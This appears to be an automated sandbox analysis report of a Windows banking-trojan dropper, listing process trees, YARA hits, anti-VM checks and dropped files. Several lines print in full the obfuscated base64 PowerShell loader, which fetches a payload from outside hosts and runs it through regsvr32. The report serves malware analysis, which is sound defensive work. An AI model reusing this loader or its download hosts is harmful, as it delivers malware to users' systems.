Source: svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.hotspotshield.com/terms/
Source: svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.pango.co/privacy
Source: svchost.exe, 00000016.00000003.412280147.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.412123410.0000019AC659A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown DNS traffic detected: queries for: www.jsonsintl.com
Source: C:\Windows\System32\regsvr32.exe Code function: 17_2_0000000180006B24 InternetReadFile, 17_2_0000000180006B24
Source: global traffic HTTP traffic detected: GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: www.jsonsintl.com
Connection: Keep-Alive

E-Banking Fraud

Source: Yara match File source: 16.2.regsvr32.exe.28c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.regsvr32.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.regsvr32.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.regsvr32.exe.28c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.323155942.00000000028C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.505000054.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: Process Memory Space: powershell.exe PID: 6408, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP
Source: Process Memory Space: powershell.exe PID: 6408, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\AHWppkeB\
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 00007FFC65CFB3B0 appears 148 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 00007FFC65CFBD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 00007FFC65CF7FF0 appears 31 times
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windowscoredeviceinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll"
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220523
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skdzzo1y.zp2.ps1
Source: classification engine Classification label: mal100.troj.evad.win@26/11@2/4
Source: C:\Windows\System32\regsvr32.exe File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\regsvr32.exe Code function: 17_2_0000000180006F2C FindCloseChangeNotification,Process32FirstW,CreateToolhelp32Snapshot,Process32NextW, 17_2_0000000180006F2C
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5216:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6364:120:WilError_01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
Source: unknown Process created: cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}""
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_000000018000C892 push ebp; retf 16_2_000000018000C895
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_000000018000D095 push B3B8007Eh; iretd 16_2_000000018000D09A
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_000000018000D0F3 push ebp; iretd 16_2_000000018000D0F4
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_0000000180013551 push ebx; retf 16_2_0000000180013559
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_000000018000D15D push ebx; retn 0068h 16_2_000000018000D15E
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_000000018000CDA8 push ebp; iretd 16_2_000000018000CDA9
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_000000018000CE36 push 458B0086h; iretd 16_2_000000018000CE3B
Source: C:\Windows\System32\regsvr32.exe Code function: 17_2_0000000180013551 push ebx; retf 17_2_0000000180013559
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_00007FFC65D00CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 16_2_00007FFC65D00CC0
Source: IKdzfJtQpj.BCP.2.dr Static PE information: real checksum: 0x654f5 should be: 0x60ea5
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\AHWppkeB\tZBUnLQvw.dll (copy)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\regsvr32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\svchost.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6460 Thread sleep count: 3984 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6460 Thread sleep count: 1628 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6972 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6180 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6236 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6088 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5452 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5576 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\regsvr32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3984 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1628 Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe API coverage: 9.1 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 17_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose, 17_2_00000001800248B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: powershell.exe, 00000002.00000003.314531683.0000000007C68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.314599281.0000000007CA2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: powershell.exe, 00000002.00000003.299265609.00000000055B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.321229608.00000000052DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V
Source: svchost.exe, 00000013.00000002.506415446.0000025912461000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: svchost.exe, 00000016.00000002.436665158.0000019AC5CF5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 0000001D.00000002.506472989.0000021041C58000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware7,1ized
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware7,1
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: svchost.exe, 00000007.00000002.503991655.0000013648C02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: regsvr32.exe, 00000011.00000003.391691578.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504289621.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.504833353.000002590CC29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.506373657.0000025912449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436651774.0000019AC5CED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.431270791.0000019AC5C80000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436453296.0000019AC5C80000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.505261417.0000021040CC7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.504593102.0000021040C2E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.504871113.0000021040C5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: svchost.exe, 0000001D.00000002.506472989.0000021041C58000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.ed
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIES1371
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM
Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021
Source: svchost.exe, 00000007.00000002.504260909.0000013648C28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.504324555.000002495A829000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000002.00000003.299265609.00000000055B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.321229608.00000000052DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_00007FFC65CFBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FFC65CFBE50
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_00007FFC65D00215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error, 16_2_00007FFC65D00215
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_00007FFC65D00CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 16_2_00007FFC65D00CC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_00007FFC65CFBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FFC65CFBE50
